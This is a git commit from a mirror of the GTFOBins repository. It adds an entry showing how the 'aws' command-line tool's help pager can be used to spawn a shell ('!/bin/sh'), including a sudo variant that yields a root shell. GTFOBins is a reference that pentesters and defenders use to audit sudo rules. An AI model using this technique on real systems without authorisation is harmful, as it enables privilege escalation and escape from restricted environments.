1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Yuta Yamate 2022-12-16 19:58:13 +09:00 committed by GitHub
parent 055ef78280
commit 18774ef89a
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

13
_gtfobins/aws.md Normal file
View File

@ -0,0 +1,13 @@
---
functions:
shell:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
aws help
!/bin/sh
sudo:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo aws help
!/bin/sh
---